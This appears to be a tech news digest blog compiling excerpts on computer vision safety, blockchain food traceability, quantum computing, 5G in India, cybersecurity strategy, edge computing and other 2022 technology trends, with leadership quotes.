Computer vision has progressed from an experimental technology to one that can interpret patterns in images and classify them using machine learning algorithms to scale. Advances in deep learning and neural networks enable computer vision uses to increase for enterprises, improving worker safety in the process. Computer vision techniques to reduce worker injuries and improve in-plant safety are based on unsupervised machine learning algorithms that excel at identifying patterns and anomalies in images. Computer vision platforms, including Everguard’s SENTRI360, rely on convolutional neural networks to categorize images and industrial workflows at scale. The quality of the datasets used to train supervised and unsupervised machine learning algorithms determines their accuracy. Convolutional neural networks also require large amounts of data to improve their precision in predicting events, fine-tuned through iterative cycles of machine learning models. Each iteration of a machine learning model then extracts specific attributes of an image and, over time, classifies attributes. 


'Work’ in 2022: What’s next?

Undoubtedly, it needs a complete overhaul of the existing policies, but what we must not forget is that in an evolving environment nothing can be treated as constant. Therefore, swift revision of new policies is very important to match up to the changing scenarios while maintaining people centricity as the central thought. Knowing the employee pulse will be the key to create or revise policies for which regular surveys, town halls, leadership connections are extremely important. Employee safety and well-being will continue to hold the top of mind space and the inclination of workplace culture transformation would be towards empathy and flexibility. Though the challenge of overcoming ‘how-much-is-too-much’ is something that the organizations would need to solve for. They will have to rally together to find the sweet spot to maintain the right balance between productivity and not hampering the work life balance of the employees. ... If data is considered the new oil of the 21st century, ‘Trust’ will become equivalent to it in the post pandemic world making the relationship between the employer and the employee go through a gradual transition where managing expectations from both ends will be essential.


Blockchain technology developments help elevate food safety protocols

Blockchain technologies, something we have been discussing for a few years, are closer than we think. Transparency, traceability, and sustainability are vital to everyone in the industry. The FDA has outlined four core elements in the New Era of Smarter Food Safety Blueprint, and the first of these elements is tech-enabled traceability. Traceability processes are critical to ensure all food items are traced and tracked throughout the supply chain. Traceability is essential for food safety as well as operational efficiency. With a solid traceability program, it is possible to locate a product at any stage of the food chain within the supply chain — literally from farm to table. For this technology to work well, it must be user-friendly and affordable to all — small businesses and large corporations alike. When it is available and widely used, it will minimize foodborne illness outbreaks and assist significantly with speeding up the process of finding the source if an outbreak does occur. Affordable digital technology connecting buyers with validated verified sellers is at the forefront. 


I followed my dreams and got demoted to software developer

I was just a UX person, not a coder. Surrounded by only the most freakishly good developers at Facebook (and then at Stack Overflow), I pushed whatever fantasies I had about coding professionally aside. During these few years in which I’ve been coding in earnest on the side, I also found myself regularly discouraged and confused by the sheer number of possible things that I could learn or do. I can’t count the number of quarter-finished games and barely-started projects I have in my private GitHub repos (actually, I can. It’s 15, and those are just the ones that made it there). Without much formal education in this field, I’d frequently get lost down documentation holes and find myself drowning in the 800 ways of maybe solving the problem that I had. Finally, I came to the conclusion that I needed more structure, and that I wouldn’t be able to get that structure in the hour of useful-brain-time I had after work each day. I started researching bootcamps and doing budget calculations and made plans to leave Stack Overflow. 


Quantum Computing In 2022: A Leap Into The Tremendous Future Ahead

The different analyses and drives with quantum computing by the big tech and other organizations are setting out an ocean of open doors before CIOs and IT offices to apply the innovation into this present reality settings. Quantum computers are undeniably appropriate for settling complex optimization- and performing quick quests of unstructured data, as Prashanth Kaddi, Partner, Deloitte India makes reference to, “it can possibly bring problematic change across areas, including finding, medication research, dispersion store network, traffic flow, energy optimizing and many more. Quantum computing additionally fundamentally diminishes time to market, just as helps in enhancing customer delivery. For instance, a drug organization may essentially decrease an opportunity to showcase new medications. In finance, it could empower quicker, more complicated Monte Carlo stimulations, like trading, trajectory optimisation, market instability, and value advancement procedures, and some more.


New data-decoding approach could lead to faster, smaller digital tech

Just one trifling issue: Encoding or decoding data in antiferromagnets can be a bit like trying to write with a dried-up pen or decipher the scribblings of a toddler. "The difficulty—and it's a significant difficulty—is how to write and read information," said Tsymbal, George Holmes University Professor of physics and astronomy. The same antiferromagnetic property that acts as a pro in one context—the lack of a net magnetic field preventing data corruption—becomes a con when it comes to actually recording data, Tsymbal said. Writing a 1 or 0 in a ferromagnet is a simple matter of flipping its spin orientation, or magnetization, via another magnetic field. That's not possible in an antiferromagnet. And whereas reading the spin state of a ferromagnet is similarly straightforward, it's not easy distinguishing between the spin states of an antiferromagnet—up-down vs. down-up—because neither produces a net magnetization that would yield discernible differences in the flow of electrons. Together, those facts have impeded efforts to develop antiferromagnetic tunnel junctions with practical use in actual devices.


IoT & AI Applications in Fisheries Industry Can Bring Another Blue Revolution, Read How?

IoT devices and AI are assisting fisheries in optimizing where and when they fish, as well as there are sensors that identify fish and catch size and onboard cameras aid in sorting the catch. The data can also assist the wild fishing industry cut expenses by providing insights on how to cut fuel usage and enhance fleet maintenance using AI predictive maintenance. According to McKinsey, if large-scale fishing enterprises around the world adopt this concept, they may save $11 billion in annual operating costs. With feed accounting for a considerable amount of operating costs and both under and overfeeding having severe consequences for fish health and size as well as water quality, feeding optimization can result in significant savings and benefits. Many smart fish farms, such as efishery, use feeders that rely on vibration and auditory cues to help with more accurate feeding. The use of technology in aquaculture management is also boosting efficiencies and reducing manpower demands, which is a significant financial and safety benefit for remote marine farms.


Advanced Analytics: A Look Back at 2021 and What's Ahead for 2022

Companies want to become more advanced in analytics in order to better compete. Yet, they are struggling with both keeping talent in house and building new talent to perform more advanced analytics. In other words, organizations need to build literacy to utilize tools such as self-service BI, and they need to either retain or grow talent to move forward with data science. Data literacy was a priority in 2021 and it will continue to be in 2022. Data literacy involves how well users understand and can interact with data and analytics and communicate the results to achieve business goals. It includes understanding data elements, understanding the business, framing analytics, critical interpretation, and communication skills. As part of this, we expect to see more organizations building literacy enablement teams to help educate their people. We expect to see modern analytics tools with more advanced and augmented features such as natural language search and the ability to surface descriptive insights becoming more popular. 



Quote for the day:

"The best leader brings out the best in those he has stewardship over." -- J. Richard Clarke

Daily Tech Digest - January 01, 2022

The Future Role of the Chief Innovation Officer

One of the key ideas highlighted today is making your business resilient. As enterprises move forward in a post-pandemic period, organizational resiliency will be among the main goals, and innovation will be at the heart of becoming resilient. Chief innovation officers will help companies develop the ability to rapidly respond to unexpected events and the associated shift in customer needs. The key here is how to make your products and services flexible to cope with significant business disruptions. Most people think that developing innovative ideas is solely the role of the chief innovation officer. But this is not true. Chief innovation officers do not have a monopoly of knowledge when it comes to new ideas. In most instances, the role of chief innovation officers is to cultivate a company culture that allows other people within the organization to develop new ideas. They do that by training people to become innovative and helping create a work environment that encourages individuals to contribute new ideas for the company's benefit. 


Analytics and AI in 2022: Innovation in the era of COVID

From low-code, we move to what we might call "low-data." Dr. Jans Aasman, CEO of Franz Inc., characterized the new normal of personal data analytics: "in 2022 we will see new ways for users to regain control of their data." That's great, but it's yet another disruption, forcing companies to personalize experiences without access to as much personal data. Jennifer Krizanek, President, NA and CMO of Contentserv, describes the challenge: "2022 will witness businesses strategizing on how to personalize the customer experience without breaking GDPR laws or infringing on consumers' data privacy rights." She further opines that next year "will be the year in which businesses learn how to operate, market and personalize their offerings to consumers without tracking their every move." But how can that be done? For openers, Denodo's Shankar says that "in 2022, organizations will leverage small data analytics to create hyper personalized experiences for their individual customers to understand customer sentiment around a specific product or service within a short time window." 


What the Rise in Cyber-Recon Means for Your Security Strategy

Enterprises need to be aware that an increase in new cybercriminals armed with advanced technologies will increase the likelihood and volume of attacks. Standard tools must be able to scale to address potential increases in attack volumes. These tools also need to be enhanced with artificial intelligence (AI) to detect attack patterns and stop threats in real time. Critical tools should include anti-malware engines using AI detection signatures, endpoint detection and response (EDR), advanced intrusion prevention system (IPS) detection, sandbox solutions augmented with MITRE ATT&CK mappings and next-gen firewalls (NGFWs). In the best-case scenario, these tools are deployed consistently across the distributed network (data center, campus, branch, multi-cloud, home office, endpoint) using an integrated security platform that can detect, share, correlate and respond to threats as a unified solution. Cybercriminals are opportunistic, and they’re also growing increasingly crafty. We’re now seeing them spend more time on the reconnaissance side of cyberattacks.


Is Apple making the same mistakes made by Nokia?

The fall of Nokia and the rise of Apple as a smartphone giant are deeply intertwined. Apple, which throughout the global recession near-unfailingly smashed Wall Street forecasts, is beginning to lose its aura of invincibility. Apple took a $6 billion hit to its sales during the fiscal fourth quarter due to persistent global supply chain problems. The company has missed Wall Street targets twice in under a year. CEO Tim Cook may now have to worry more about economic and product launch cycles, and the whims of fickle consumers. The blockbuster smartphone that adds a special gloss to the Apple brand is a highly cyclical product. Buyers emerge in droves every time a new version is launched, lining up at stores overnight, and snarling supply for the device. Its popularity has heightened speculation around the device every year as over 100 million yearly customers decide when to switch to a new model, whether to buy now or hold out for a better but same-priced phone.


2021 Information security in memes and tweets

For those who don’t know: Cellebrite produces equipment for so-called competent authorities, allowing employees to easily and conveniently hack into smartphones and retrieve information of interest from them. That’s why the company holds a special place in the hearts of privacy advocates. In late 2020, Cellebrite announced that their products were beginning to support Signal. In response, the Signal team published a study of vulnerabilities in Cellebrite hardware and accompanied it with an unparalleled teaser ... Colonial Pipeline, the largest U.S. pipeline system that moves petroleum products, was attacked by ransomware, disrupting gasoline and diesel supplies across the southeast coast of the country. The incident sparked a lot of discussion about how these kinds of businesses should be protected, and the company’s own announcement of a search for a new cybersecurity manager went viral on social media as a meme, with the comment “They probably have a decent budget now.” 


Understanding 5G in India in 2022

5G is not very different in principle from 4G. It uses the same mobile network principles as 4G, but the only difference is, 5G New Radio (NR) air interface can enhance OFDM for delivering a much higher degree of scalability and flexibility. 5G also brings higher bandwidth spectrum frequencies into play. The spectrum in the millimetre wavelength bands and sub-6 GHz bands will be used for 5G services which will be the first time such high-frequency airwaves will be used for rolling out mobile network services. This enables 5G to be way different than 4G when it comes to the use cases and its applications. The mobile ecosystem will touch upon new realms with 5G, which wasn’t possible with the previous generation technologies. Just comparing with 4G networks, 5G is faster, has more capacity, delivers significantly lower latency, is a more unified platform than 4G, and uses a higher frequency spectrum better than 4G would have ever been able to. 5G is designed to support more mission-critical applications and communications and also bring the massive Internet-of-Things (IoT) to the table.


Predictions 2022: Edge tech, enterprise 5G, cybersecurity in focus

The Edge discussion will separate into two focus areas – edge platforms that provide a stable pool of secure capacity for the diverse edge ecosystems and software defined edge workloads/software stacks that extend application and data systems into real world environments. We are already seeing this shift today. As we move into 2022, we expect edge platforms to become more capable and pervasive. ... Edge will become the new battleground for data management as the latter becomes a new class of workload. Data management and the edge will increasingly converge and reinforce each other. The cybersecurity industry is now moving from discussion of emerging security concerns to a bias toward action. Enterprises and governments are facing threats of greater sophistication and impact on revenue and services. As a result, the cybersecurity industry is responding with greater automation and integration. The industry is also pivoting from automated detection to prevention and response with a focus on applying AI and machine learning to speed remediation.


Top 6 Trends Shaping Digital Transformation in 2022

More enterprises will also see a shift toward low-code or no-code software adoption. These tools have long been the source of some controversy in the IT industry because many developers have feared their jobs would become obsolete if companies could operate on low-code software alone. However, this category of tools has proven to be an asset to developers in recent years. “No-code tools are great to solve simpler problems,” says Dean Guida, CEO and founder of Infragistics. “When you combine low-code tools and professional developers you can tackle the higher impact digital solutions that will give competitive advantage to organizations.” Low-code and no-code software means developers can prioritize innovation and business growth rather than spending time building tools for day-to-day operations. But that’s not where the benefits stop. Low-code solutions also provide an opportunity for professionals in other parts of the organization to make smarter decisions without confronting a steep learning curve.


Mind-Controlled Robots A Step Closer To Realization

The two research groups developed a computer program that made it possible to control a robot just by using thoughts; no voice control or touch is necessary. The system receives input from a person’s brain through a head cap equipped with electrodes for performing electroencephalogram (EEG) scans of the user’s brain signals. To use this robot arm, all the person has to do is look at it. The robot will automatically understand if it has done something wrong as our brains will emit a signal that tells the robot, “Not like that.” The system uses a combination of inverse reinforcement learning (IRL) techniques and brain-computer interfaces (BCI) that decode error-related potentials (ErrP), which allows the system to have a reward function depending on the user’s ErrP. In other words, through a hit-and-trial method, the robot figures out the user’s needs by interpreting their brain signals. According to the lead author, Iason Batzianoulis, what was particularly difficult from a technical viewpoint was “‘translating’ a patient’s brain signals into actions performed by the robot.” They did that by using machine learning to link each brain signal to specific tasks.


An overview of 7 tech trends reshaping enterprise architecture

While edge computing isn’t necessarily a new technology, it’s still a fairly new computing practice, not yet having gained the traction that hybrid cloud has. Hybrid cloud allows you to keep leveraging your on-premises infrastructure and your choice of a combination of public and private cloud services. It also enables you to scale on-demand and take advantage of AI/ML capabilities to help parse data faster. If a cloud environment can use a hybrid model, then so can a microservices environment. Integrate the two, and you’ve got the power of your legacy systems without having to deal with the complex layers of those systems. How? Because a microservices architecture allows you to componentize the most beneficial parts of your application. Microservice architecture, often used in cloud-native integration solutions, has made it easier for teams to code more efficiently, debug, and deploy faster, slowly replacing the massive, inflexible legacy systems. When managed correctly, microservices allow developers to better understand the source code without slowing down development because code review, application build, and deployment are streamlined compared to monolithic applications.



Quote for the day:

"Leadership is absolutely about inspiring action, but it is also about guarding against mis-action." -- Simon Sinek